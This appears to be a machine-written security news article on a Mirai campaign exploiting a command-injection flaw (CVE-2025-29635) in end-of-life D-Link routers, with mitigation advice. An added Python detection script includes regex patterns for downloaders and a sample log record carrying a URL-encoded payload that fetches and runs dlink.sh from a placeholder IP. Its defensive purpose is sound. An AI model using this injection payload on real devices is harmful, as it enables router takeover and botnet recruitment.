

Ethical Hacking News

New Mirai Campaign Exploits CVE-2025-29635 Vulnerability in EoL D-Link Routers




A new Mirai campaign has been discovered that actively exploits a critical vulnerability in outdated D-Link DIR-823X routers, allowing attackers to execute arbitrary commands on remote devices. This exploit highlights the ongoing threat posed by IoT devices and emphasizes the importance of keeping software up-to-date with the latest security patches.



  • A new Mirai-based malware campaign exploits a high-severity command-injection vulnerability (CVE-2025-29635) in outdated D-Link DIR-823X routers.
  • The exploit allows authorized attackers to execute arbitrary commands on remote devices via POST requests to the /goform/set_prohibiting endpoint.
  • Attackers are sending POST requests that change directories, download a shell script (dlink.sh) from an external IP, and execute it.
  • This campaign is the first observed in-the-wild exploitation of CVE-2025-29635.
  • Users of affected routers should upgrade to newer models with frequent security fixes, disable remote administration portals, change default admin passwords, and monitor for unexpected configuration changes.



    A new Mirai-based malware campaign has been identified that actively exploits a high-severity command-injection vulnerability (CVE-2025-29635) affecting outdated D-Link DIR-823X routers and enlists the devices into the botnet. The exploit relies on an authorized attacker sending a POST request to a vulnerable endpoint on these routers, which triggers remote command execution (RCE).

    According to Akamai's SIRT (Security Intelligence Team), this vulnerability exists in D-Link DIR-823X series routers with firmware versions 240126 and 24082. The flaw allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint, triggering RCE through the corresponding function.

    The researchers who discovered this vulnerability briefly published a proof-of-concept (PoC) exploit on GitHub but later retracted it. Akamai's observations show that attackers are sending POST requests that change directories across writable paths, download a shell script (dlink.sh) from an external IP, and execute it.
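
    One way to hunt for the request pattern described above in HTTP sensor or proxy logs, as an added example that is not code from Akamai or from the original article. The JSON record layout (src, method, path, body), the form field name "param", the list of writable paths and all sample records are constructed assumptions.

```python
import json
import re
from urllib.parse import parse_qsl

ENDPOINT = "/goform/set_prohibiting"  # endpoint named in the article
# Indicators for the behaviour described above: change directory, fetch a
# script (dlink.sh) from a remote host, run it. The path list is an assumption.
INDICATORS = {
    "shell_metachar": re.compile(r"[;|&`]|\$\("),
    "cd_writable_path": re.compile(r"\bcd\s+/(tmp|var|dev|mnt)\b"),
    "downloader": re.compile(r"\b(wget|curl|tftp)\b"),
    "dlink_sh": re.compile(r"\bdlink\.sh\b"),
}

def score_event(event):
    """Return sorted indicator names matched by one logged HTTP request."""
    if event.get("method", "").upper() != "POST":
        return []
    if event.get("path", "").split("?")[0].rstrip("/") != ENDPOINT:
        return []
    # Decode the form body and inspect field names and values separately, so
    # the "&" between ordinary form fields is not read as a shell operator.
    pairs = parse_qsl(event.get("body", ""), keep_blank_values=True)
    text = "\n".join(part for pair in pairs for part in pair)
    return sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def scan(lines):
    """Return [(source_ip, hits)] for requests matching at least one indicator."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or malformed sensor records
        hits = score_event(event) if isinstance(event, dict) else []
        if hits:
            alerts.append((event.get("src", "?"), hits))
    return alerts

def _rec(src, method, path, body):
    return json.dumps({"src": src, "method": method, "path": path, "body": body})

# Constructed sample records using documentation-range IP addresses.
SAMPLE = [
    _rec("192.0.2.10", "POST", ENDPOINT, "param=aa%3Abb%3Acc%3A00%3A11%3A22&enable=1"),
    _rec("203.0.113.77", "POST", ENDPOINT,
         "param=x%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.9%2Fdlink.sh%3Bsh+dlink.sh"),
    _rec("203.0.113.78", "GET", ENDPOINT, ""),
    _rec("203.0.113.79", "POST", "/login", "q=wget"),
    "truncated {record",
]
```

    Because exploitation requires an authorized session, a hit from an unexpected source address also points to weak or default admin credentials on the device.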

    This campaign marks the first time active in-the-wild exploitation of CVE-2025-29635 has been observed. The vulnerability was first disclosed by security researchers Wang Jinshuai and Zhao Jiangting 13 months ago but remains unpatched on many devices.

    The implications of this exploit are significant, as it highlights the ongoing threat posed by outdated hardware and the importance of keeping software up-to-date with the latest security patches. In particular, users of routers that have reached end-of-life (EoL) should be cautious and take steps to protect their devices from potential attacks.

    BleepingComputer has contacted D-Link regarding the reported activity and will update this post as soon as they receive a response. Meanwhile, users of affected routers are advised to upgrade to newer models that are actively supported and receive frequent security fixes, disable remote administration portals if not needed, change default admin passwords, and monitor for unexpected configuration changes.

    The increasing use of Mirai-based malware highlights the ongoing threat posed by IoT devices and their potential to be used in DDoS attacks. As such, it is essential for users to remain vigilant and take steps to protect themselves from these types of threats.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/New-Mirai-Campaign-Exploits-CVE-2025-29635-Vulnerability-in-EoL-D-Link-Routers-ehn.shtml

  • https://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/

  • https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices

  • https://www.helpnetsecurity.com/2026/04/22/new-mirai-variants-target-routers-and-dvrs-via-old-flaws/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-29635

  • https://www.cvedetails.com/cve/CVE-2025-29635/


  • Published: Wed Apr 22 15:53:31 2026 by llama3.2 3B Q4_K_M












